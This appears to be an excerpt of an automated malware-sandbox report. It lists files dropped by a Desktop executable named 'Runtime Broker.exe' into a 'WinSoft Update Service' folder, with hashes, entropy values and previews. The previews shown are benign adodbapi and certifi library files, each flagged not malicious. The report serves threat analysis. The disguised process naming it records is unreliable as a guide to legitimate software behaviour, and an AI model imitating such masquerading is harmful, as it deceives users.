Preview:	""" a clumsy attempt at a macro language to let the programmer execute code on the server (ex: determine 64bit)"""..from . import is64bit as is64bit....def macro_call(macro_name, args, kwargs):.. """ allow the programmer to perform limited processing on the server by passing macro names and args.... :new_key - the key name the macro will create.. :args[0] - macro name.. :args[1:] - any arguments.. :code - the value of the keyword item.. :kwargs - the connection keyword dictionary. ??key has been removed.. --> the value to put in for kwargs['name'] = value.. """.. if isinstance(args, (str, str)):.. args = [args] # the user forgot to pass a sequence, so make a string into args[0].. new_key = args[0].. try:.. if macro_name == "is64bit":.. if is64bit.Python(): # if on 64 bit Python.. return new_key, args[1] # return first argument.. else:.. try:.. return new_key, args[

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\readme.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5077
Entropy (8bit):	4.884297848702526
Encrypted:	false
SSDEEP:	96:/yxrPLNlZYTR9xq6YnSzzQuOldblTEN8tvEqGcVEf7NjVDlUzYfi2T:/8/TXdbdvDGcVEf7NjH3L
MD5:	57C9E012D4EDD985537CFDAB7A480C8F
SHA1:	E79E4B89D08954B8A9949148F6E6C8E14E2813D1
SHA-256:	2E4EE2F591480A5ED3E2750BB04CCA0621F0F1B195C9A2F320C14ED0541DDBDD
SHA-512:	1356923628D57703C1FE0D6634888F2C92F7DB1A2C123D6A6C51FED212A9C9473DDC2DB1D4D9FF3A86AF9FDD328DAF2BD54F2ECB050CAE93E114703FE1D24EBD
Malicious:	false
Preview:	Project..-------..adodbapi....A Python DB-API 2.0 (PEP-249) module that makes it easy to use Microsoft ADO ..for connecting with databases and other data sources..using either CPython or IronPython.....Home page: <http://sourceforge.net/projects/adodbapi>....Features:..* 100% DB-API 2.0 (PEP-249) compliant (including most extensions and recommendations)...* Includes pyunit testcases that describe how to use the module. ..* Fully implemented in Python. -- runs in Python 2.5+ Python 3.0+ and IronPython 2.6+..* Licensed under the LGPL license, which means that it can be used freely even in commercial programs subject to certain restrictions. ..* The user can choose between paramstyles: 'qmark' 'named' 'format' 'pyformat' 'dynamic'..* Supports data retrieval by column name e.g.:.. for row in myCurser.execute("select name,age from students"):.. print("Student", row.name, "is", row.age, "years old.")..* Supports user-definable system-to-Python data conversion functions (selected by ADO

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\remote.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	19896
Entropy (8bit):	4.5493669740790645
Encrypted:	false
SSDEEP:	384:n2huQztB2mvjX9b1aa+cvDJFkHZCzSjdDd:n2huQztRvjtDJFAjjdDd
MD5:	4C2DFECD18E2C550EA1EC106FA0C4FA8
SHA1:	79A0077BDB9FAB77C0A43DFCDCF18A9704DFF3D6
SHA-256:	3EDBA6B4D126E70BCC71FFC8B23C92E9EA17431F3B4AB971C375715960E97A7B
SHA-512:	4DCCE965056D309631A515674A8F892094317BC97E2DB359B4E6A8BB763BE0C10C950E9667130A02DD8AFB89B9E7617A7071975CEDB973EB67394F14B5D41761
Malicious:	false
Preview:	"""adodbapi.remote - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole.* http://sourceforge.net/projects/pywin32.* http://sourceforge.net/projects/adodbapi.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. django adaptations and re

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\schema_table.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	432
Entropy (8bit):	4.741784618097318
Encrypted:	false
SSDEEP:	12:JFS/gWWyeWNG+hbeashXFmitoXfy5LwAqgz9/wdOic//yOv:6/lsaGX0Xa5chgx/i0/6Ov
MD5:	3C93C5C95FC6FC9F454B67373B8BD999
SHA1:	E6284ECF53423908962409E251AEE3BA2B52C378
SHA-256:	761EE5B3C5388F7F27349172802207134E1BFCEBDE27581601373B0B3CAB1D89
SHA-512:	F9DF3B43C42DAB4198B9F5B62996204A184544F206023B264AAB61DE869590FD8D7512CA2FA38BD0D43A298B02EEAEBC7A8F06EA3753A8790C7D16A4AD6E58EA
Malicious:	false
Preview:	"""call using an open ADO connection --> list of table names"""..from . import adodbapi....def names(connection_object):.. ado = connection_object.adoConn.. schema = ado.OpenSchema(20) # constant = adSchemaTables.... tables = [].. while not schema.EOF:.. name = adodbapi.getIndexedValue(schema.Fields,'TABLE_NAME').Value.. tables.append(name).. schema.MoveNext().. del schema.. return tables..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\setup.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2982
Entropy (8bit):	5.067318969263889
Encrypted:	false
SSDEEP:	48:izCNqI/qI9QIRj6gILyk13LeL7RaDawkEdOxvShKNh5ptA/rMnpINX9cGAjvAT/W:izCNr/r9QIRGgILyk13Q7RaD7kMOxqhC
MD5:	2D5C711FB46932E36F01607314DE1CB6
SHA1:	C5C525BCC334126A1B670D82C4C58DFFDCECDCCC
SHA-256:	B7ACAA62713A249A724D6C87C9A0D6FB8906721DAB36D48228B0B2F2E4C99D08
SHA-512:	AA310E07664D7F94F429DF8C87EEF6BA7EF1DCDB83CC080092A31D5267261108A3ADBA9D924A69225C91A35A4BAB34187E5493AD154CE506AA793AA604BF305A
Malicious:	false
Preview:	"""adodbapi -- a pure Python PEP 249 DB-API package using Microsoft ADO..Adodbapi can be run on CPython version 2.7,.or IronPython version 2.6 and later,.or Python 3.5 and later (after filtering through 2to3.py).""".CLASSIFIERS = """\.Development Status :: 5 - Production/Stable.Intended Audience :: Developers.License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL).Operating System :: Microsoft :: Windows.Operating System :: POSIX :: Linux.Programming Language :: Python.Programming Language :: Python :: 3.Programming Language :: SQL.Topic :: Software Development.Topic :: Software Development :: Libraries :: Python Modules.Topic :: Database."""..NAME = 'adodbapi'.MAINTAINER = "Vernon Cole".MAINTAINER_EMAIL = "vernondcole@gmail.com".DESCRIPTION = """A pure Python package implementing PEP 249 DB-API using Microsoft ADO.""".URL = "http://sourceforge.net/projects/adodbapi".LICENSE = 'LGPL'.CLASSIFIERS

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\adodbapitest.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	55811
Entropy (8bit):	4.711258975787992
Encrypted:	false
SSDEEP:	384:MkuQJ4q695SdNPJoI/qR6PeeXWhaWNh3JjPdax26wPUUs2P0mi2Oa7Bb9HeIb2QC:MkuQJ4yDPWI/qR6GGkaahFdEjwX0cZC
MD5:	1C9EAFC2BE3C1CF14114143357F59E65
SHA1:	B792010293C5BA59D5BE69CB1C2E8DA294E6E684
SHA-256:	41D13007BD78790315328F0694070FD21B9A3D3486DDC23632A561DF1F87B3FC
SHA-512:	CEA60664FC0130089B8AE40F9DD2AA979F6DD7EB3ABDDBBEE13EDFF2F9C71407F1BF7896A4D5FD50F5ED0F0104FB083B4D3FB35598178931FC6370E118A8D1E7
Malicious:	false
Preview:	""" Unit tests version 2.6.1.0 for adodbapi""".""". adodbapi - A python DB API 2.0 interface to Microsoft ADO.. Copyright (C) 2002 Henrik Ekelund.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. Updates by Vernon Cole."""..import unittest.import sys.import datetime.import decimal.import copy.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\adodbapitestconfig.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7361
Entropy (8bit):	4.944210579425516
Encrypted:	false
SSDEEP:	192:RIFQFzB96hWy/h5jJD7qr+VtGoCAQwDSDY4:RxsIy/XjJDkgQ/wDuY4
MD5:	3185492B05D00257F61FA02DE9CC038F
SHA1:	C27146BB719477242BF875421E76717F10B80D92
SHA-256:	A5A48C5126EE839748D124DD2F93B83C4F3E13151135F790AE0A0DA5FCBEF747
SHA-512:	08C194E913002D9B34B5206379F83C1A06B198B4B31B8CCA00DF6707BDEF7586732E80ADD77FC4E824EE82136DCDF05261DB214BD6A56C10F0C69E31DC66791B
Malicious:	false
Preview:	# Configure this to _YOUR_ environment in order to run the testcases.."testADOdbapiConfig.py v 2.6.2.B00"..# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #.# #.# # TESTERS:.# #.# # You will need to make numerous modifications to this file.# # to adapt it to your own testing environment..# #.# # Skip down to the next "# #" line --.# # -- the things you need to change are below it..# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #.import platform.import sys.import random..import is64bit.import setuptestframework.import tryconnection..print("\nPython", sys.version).node = platform.node().try: print('node=%s, is64bit.os()= %s, is64bit.Python()= %s' % (node, is64bit.os(), is64bit.Python())).except: pass..if '--help' in sys.argv:. print("""Valid command-line switches are:. --package - create a temporary test package, run 2to3 if needed.. --all - run all possible tests. --time - loop over time format tests (including mxdatetime if present). --nojet

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\dbapi20.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	34080
Entropy (8bit):	4.365679161361469
Encrypted:	false
SSDEEP:	192:W78xud+br2PCZIDiCb87y3gmXKGGU2vY9m6j3Kyj9oMDDq/NnCMujGJ606zzUj9J:W78x/A8O3gmsULAU3VjSVnPv/1us9
MD5:	54D2BEE0B96C57C30291C60607778E79
SHA1:	1A37781D94D27E89431AD7AE094D926808763B6B
SHA-256:	0B12A9425B1E7E13148C9E03F54483CA335E4F74D33E11C36AB2F5857114F2AF
SHA-512:	5E011D90EA7E0BD4114B290A6FE2D2CFAE25208F338141758309BAB023926CB03E52F7FD60193A35666C808ECC92B305296EB32A69A275D82CB36663C5EFA508
Malicious:	false
Preview:	#!/usr/bin/env python.''' Python DB API 2.0 driver compliance unit test suite. . . This software is Public Domain and may be used without restrictions... "Now we have booze and barflies entering the discussion, plus rumours of. DBAs on drugs... and I won't tell you what flashes through my mind each. time I read the subject line with 'Anal Compliance' in it. All around. this is turning out to be a thoroughly unwholesome unit test.".. -- Ian Bicking.'''..__version__ = '$Revision: 1.15.0 $'[11:-2].__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'..import unittest.import time.import sys..if sys.version[0] >= '3': #python 3.x. _BaseException = Exception. def _failUnless(self, expr, msg=None):. self.assertTrue(expr, msg).else: #python 2.x. from exceptions import Exception as _BaseException. def _failUnless(self, expr, msg=None):. self.failUnless(expr, msg) ## deprecated since Python 2.6..# set this to "True" to follow API 2.0 to

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\is64bit.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	1191
Entropy (8bit):	4.715305201798576
Encrypted:	false
SSDEEP:	24:tHUmPtH+vt/1T77ChCWiEkH//BQ7/hMiWnKF7BSfSQVvgGgQtICdeeppJRNE:tHXVHwtNTeC5bH//S7Cnk7BSfSQqGgQK
MD5:	01EF40F1AC4222D2CFBC2790B32DF9F4
SHA1:	6EB2B02322A629E419BE10738EB98ACCE8A1B49D
SHA-256:	661D0E7B2787E94A1050B08A6F5462D3B5A77C8B2AD819FF8CE264965B7A1A46
SHA-512:	FDDF62982840644BD4A82516938EAB41C30DD50D5AC986DD5D5B2BCA8744B72618596DAC7EAC70F3BE23520CC02E9B1C84A2A71308384E52B1207F47661C944F
Malicious:	false
Preview:	"""is64bit.Python() --> boolean value of detected Python word size. is64bit.os() --> os build version"""..import sys....def Python():.. if sys.platform == 'cli': #IronPython.. import System.. return System.IntPtr.Size == 8.. else:.. try:.. return sys.maxsize > 2147483647.. except AttributeError:.. return sys.maxint > 2147483647....def os():.. import platform.. pm = platform.machine().. if pm != '..' and pm.endswith('64'): # recent Python (not Iron).. return True.. else:.. import os.. if 'PROCESSOR_ARCHITEW6432' in os.environ:.. return True # 32 bit program running on 64 bit Windows.. try:.. return os.environ['PROCESSOR_ARCHITECTURE'].endswith('64') # 64 bit Windows 64 bit program.. except IndexError:.. pass # not Windows.. try:.. return '64' in platform.architecture()[0] # this often works in Linux.. except:.. r

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\setuptestframework.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	4159
Entropy (8bit):	4.5518780528073375
Encrypted:	false
SSDEEP:	96:Jzy2DPp54RfdnNWZ8uH8MlME8D/Ik4oKRpuOf6iSB5:J24PcRlnNWxg/98HCi6
MD5:	B808E9DA78EBE6DAE62FD1AAD6A783BD
SHA1:	1D5C2F57D4D31542BCC8E2D94893DAB2C5CD0814
SHA-256:	1C54B4696BAB8481C080EB0825DA5880B4DA209E7C77F0068FB6688279A6F19C
SHA-512:	9E2402696A0668CBF36160B14CFA5A6083286571C3BA5045F0E6B04C43611E36DCDB0BE0EA85337AD0FAE6211CED0D2C57743F9D503867228C2609F33E13A896
Malicious:	false
Preview:	#!/usr/bin/python2..# Configure this in order to run the testcases..."setuptestframework.py v 2.6.0.8"..import os..import sys..import tempfile..import shutil....try:.. OSErrors = (WindowsError, OSError)..except NameError: # not running on Windows.. OSErrors = OSError....def maketemp():.. temphome = tempfile.gettempdir().. tempdir = os.path.join(temphome, 'adodbapi_test').. try: os.mkdir(tempdir).. except: pass.. return tempdir....def _cleanup_function(testfolder, mdb_name):.. try: os.unlink(os.path.join(testfolder, mdb_name)).. except: pass # mdb database not present.. try:.. shutil.rmtree(testfolder).. print(' cleaned up folder', testfolder).. except: pass # test package not present....def getcleanupfunction():.. return _cleanup_function....def find_ado_path():.. adoName = os.path.normpath(os.getcwd() + '/../../adodbapi.py').. adoPackage = os.path.dirname(adoName).. return adoPackage....# make a new package directory for t

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\test_adodbapi_dbapi20.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	6000
Entropy (8bit):	4.636153077475715
Encrypted:	false
SSDEEP:	96:9fBaXE0zQzby03FO3ZAYX0qnjQHAudOFrhQMbCgl6w+THrNwT/eZSyYk:XaXJzQzby0VO3CJqnj4cUMbCRweLNwjY
MD5:	C6E225B3FD63FA1009ED57D509F090F0
SHA1:	ABAF5F9743B2A2067A98078A82C6817C92936C12
SHA-256:	968F7613E99C9BE9657B71A6A153B1E2D735C469A51BAC171E3C62F8F80A6CF8
SHA-512:	F2799F62327EC96EAA9228DA402E3EFE68BA485EAD5B9274296A3AB58CA307265DB90C90815115EFCE1B0FE3F05F049D017B72CF5F2FCD0ACF4A72BFA0D272FD
Malicious:	false
Preview:	print("This module depends on the dbapi20 compliance tests created by Stuart Bishop")..print("(see db-sig mailing list history for info)")..import platform..import unittest..import sys....import dbapi20..import setuptestframework....testfolder = setuptestframework.maketemp()..if '--package' in sys.argv:.. pth = setuptestframework.makeadopackage(testfolder).. sys.argv.remove('--package')..else:.. pth = setuptestframework.find_ado_path()..if pth not in sys.path:.. sys.path.insert(1,pth)..# function to clean up the temporary folder -- calling program must run this function before exit...cleanup = setuptestframework.getcleanupfunction()....import adodbapi..import adodbapi.is64bit as is64bit..db = adodbapi....if '--verbose' in sys.argv:.. db.adodbapi.verbose = 3....print(adodbapi.version)..print("Tested with dbapi20 %s" % dbapi20.__version__)....try:.. onWindows = bool(sys.getwindowsversion()) # seems to work on all versions of Python..except:.. onWindows = False....nod

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\test\tryconnection.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1079
Entropy (8bit):	4.45994398759956
Encrypted:	false
SSDEEP:	12:3sfx2xgFyl0KPPJzy7y2GSEPsDrNSqUnsQc3fXHFRCOFNDal6oGytGmaAlajtGtl:cfxFy1J27abPscq/bfKqcso7bYrqrTXx
MD5:	AD9FACA724C8385DD13819CF7553A6BB
SHA1:	C0C1F4450C87A08E74FE8F464A6814ABCCECE050
SHA-256:	A920EB724A6454A6FA293C8675D3945ACDB7F2F62C383FAFEF9175071D9958DC
SHA-512:	124B379BB58BA43BEF73A54B71C734D3C93EE502940C7D1A1C2899EF0F5806EFC73F750156A46A595617C60F6107FF911B3D5C6C48F96BD94682E901B8CD3CBF
Malicious:	false
Preview:	remote = False # automatic testing of remote access has been removed here..def try_connection(verbose, args, kwargs):. import adodbapi.. dbconnect = adodbapi.connect. try:. s = dbconnect(args, kwargs) # connect to server. if verbose:. print('Connected to:', s.connection_string). print('which has tables:', s.get_table_names()). s.close() # thanks, it worked, goodbye. except adodbapi.DatabaseError as inst:. print(inst.args[0]) # should be the error message. print('Failed getting connection using=',repr(args),repr(kwargs)). return False, (args, kwargs), None.. print(" (successful)").. return True, (args, kwargs, remote), dbconnect...def try_operation_with_expected_exception(expected_exception_list, some_function, args, *kwargs):. try:. some_function(args, **kwargs). except expected_exception_list as e:. return True, e. except:. raise # an exception other than

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\INSTALLER Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\LICENSE Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1048
Entropy (8bit):	5.0660471199970525
Encrypted:	false
SSDEEP:	24:AAJHkvLu4J70RRrZNC5nRvN8kg4ahrmZBzCP07U5:AAeK4JQrruBJctOBmP0W
MD5:	F77F61D14EE6FEAC4228D3EBD26CC1F1
SHA1:	EA754E241E066D60AA3E231D0C05A88B06B564B4
SHA-256:	6A70A4BF6B010016D59A64B8AE4AD8DC7F5EF16F1FB453CC2ECD771C5A341131
SHA-512:	F460C5BBD0D48EDBC5BE42A77D8A27BD2B688D1AB28B1B6AA82211784AA8A38734C7FF13B617647A00D182A3A2B54433464175602509BCF24836A4057C4FF293
Malicious:	false
Preview:	This packge contains a modified version of ca-bundle.crt:..ca-bundle.crt -- Bundle of CA Root Certificates..Certificate data from Mozilla as of: Thu Nov 3 19:04:19 2011#.This is a bundle of X.509 certificates of public Certificate Authorities.(CA). These were automatically extracted from Mozilla's root certificates.file (certdata.txt). This file can be found in the mozilla source tree:.http://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1#.It contains the certificates in PEM format and therefore.can be directly used with curl / libcurl / php_curl, or with.an Apache+mod_ssl webserver for SSL client authentication..Just configure this file as the SSLCACertificateFile.#..*** BEGIN LICENSE BLOCK *.This Source Code Form is subject to the terms of the Mozilla Public License,.v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain.one at http://mozilla.org/MPL/2.0/...* END LICENSE BLOCK ***.@(#) $RCSfile: certdata.txt,v $

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\METADATA Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2994
Entropy (8bit):	4.989178283347949
Encrypted:	false
SSDEEP:	48:DfGcq5+fy+GbFaDYxLiPkbOfzAaBZhYRztu0DpjMAmT7p3vTVfTXU+h+qLcUydy+:DfnqUxGbFaDYxmPkbGQn5DpjLmT7p3vm
MD5:	4D2B655AB51CFCC10949845D9C1F8BCB
SHA1:	400D9F606500464A92EC16C802F0FC5EE4B2DCC8
SHA-256:	484C391861C8781C06C0326C2146957C440073926AB3F5E87CE7D35FEFE4084D
SHA-512:	471C3DE5337E06361C3E1C940708627E5A94A813CBFFC94338E3ADD2E73080450213A2860722BB1EA6B120B3F48E240CDF434357177145B3D43867307DDDBCE4
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: certifi.Version: 2020.12.5.Summary: Python package for providing Mozilla's CA Bundle..Home-page: https://certifiio.readthedocs.io/en/latest/.Author: Kenneth Reitz.Author-email: me@kennethreitz.com.License: MPL-2.0.Project-URL: Documentation, https://certifiio.readthedocs.io/en/latest/.Project-URL: Source, https://github.com/certifi/python-certifi.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0).Classifier: Natural Language :: English.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\RECORD Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.8083867942654095
Encrypted:	false
SSDEEP:	24:HqVn/2zDlVvLeVY5jrVKVmqVl29yq4Q1hDfp7nWtOwKyaKGr8qU00:inuXjj2Y5jJimCl2UQ1hDBL5KGW/
MD5:	2EB818CD806597E38AF32C76548D7923
SHA1:	F6F69E65FDD02EF1853571479AF428805F3BABBC
SHA-256:	26A70A65C911BD445CE8015006A32BE37F7EE5DC06F253149D889F269F429C34
SHA-512:	FA7C1FB770CDCD236E53ACCE4B9A4EB2A38B03408BBE9A0C63C5D720937762F720CB677C3522E0A10BAB38BA1324892B5AC5BEE75E24D5B10238CF0611E18148
Malicious:	false
Preview:	certifi-2020.12.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..certifi-2020.12.5.dist-info/LICENSE,sha256=anCkv2sBABbVmmS4rkrY3H9e8W8ftFPMLs13HFo0ETE,1048..certifi-2020.12.5.dist-info/METADATA,sha256=SEw5GGHIeBwGwDJsIUaVfEQAc5Jqs_XofOfTX-_kCE0,2994..certifi-2020.12.5.dist-info/RECORD,,..certifi-2020.12.5.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..certifi-2020.12.5.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8..certifi/__init__.py,sha256=SsmdmFHjHCY4VLtqwpp9P_jsOcAuHj-5c5WqoEz-oFg,62..certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243..certifi/__pycache__/__init__.cpython-37.pyc,,..certifi/__pycache__/__main__.cpython-37.pyc,,..certifi/__pycache__/core.cpython-37.pyc,,..certifi/cacert.pem,sha256=u3fxPT--yemLvyislQRrRBlsfY9Vq3cgBh6ZmRqCkZc,263774..certifi/core.py,sha256=V0uyxKOYdz6ulDSusclrLmjbPgOXsD0BnEf0SQ7OnoE,2303..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\WHEEL Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi-2020.12.5.dist-info\top_level.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:HZ:HZ
MD5:	5EBD7F7C387EBB31C14E3C701023AC97
SHA1:	BC5EA804A025DFFDE14FBF3746E34487196073D7
SHA-256:	28CBB8BD409FB232EB90F6D235D81D7A44BEA552730402453BFFE723C345EBE5
SHA-512:	7F2312A62A532E761DC45D0FF45FFE3FA599360AC0399D59EC8A39045C9E8CB62C912FC6C6F3A1C45ADBCAA10DDE77A8493567BB478839819C15F5FDD7E5C889
Malicious:	false
Preview:	certifi.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.391808867796259
Encrypted:	false
SSDEEP:	3:1LGzbQbAwLSkJXLvvP:1LcQbjJvP
MD5:	BC9F2DE40134228ADC4EA47CA70A0BAA
SHA1:	70D0A614D3E4E46C16D7B207B10A4C89F61C7D75
SHA-256:	4AC99D9851E31C263854BB6AC29A7D3FF8EC39C02E1E3FB97395AAA04CFEA058
SHA-512:	85AB4D140B85110AF74B54DD9416CE5CEC835668814FE728C64BF24C23EAB0475428D376CD80E721A54D9E0AC17BCD42A6E058CE63825019B11DBE450C678B29
Malicious:	false
Preview:	from .core import contents, where..__version__ = "2020.12.05".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi\__main__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	243
Entropy (8bit):	4.451797874382859
Encrypted:	false
SSDEEP:	6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
MD5:	269E7F0CA2FA570B10E690595E6AEDAB
SHA1:	F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
SHA-256:	C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
SHA-512:	01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
Malicious:	false
Preview:	import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\certifi\cacert.pem Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	263774
Entropy (8bit):	6.05068805145507
Encrypted:	false
SSDEEP:	6144:fWXdA7M8f9ZJm5plXqXCRrcMBHADwYCuMsliO:fWS7vZI5LACRrcMOb/
MD5:	1BA3B44F73A6B25711063EA5232F4883
SHA1:	1B1A84804F896B7085924F8BF0431721F3B5BDBE
SHA-256:	BB77F13D3FBEC9E98BBF28AC95046B44196C7D8F55AB7720061E99991A829197
SHA-512:	0DD2A14331308B1DE757D56FAB43678431E0AD6F5F5B12C32FA515D142BD955F8BE690B724E07F41951DD03C9FEE00E604F4E0B9309DA3EA438C8E9B56CA581B
Malicious:	false
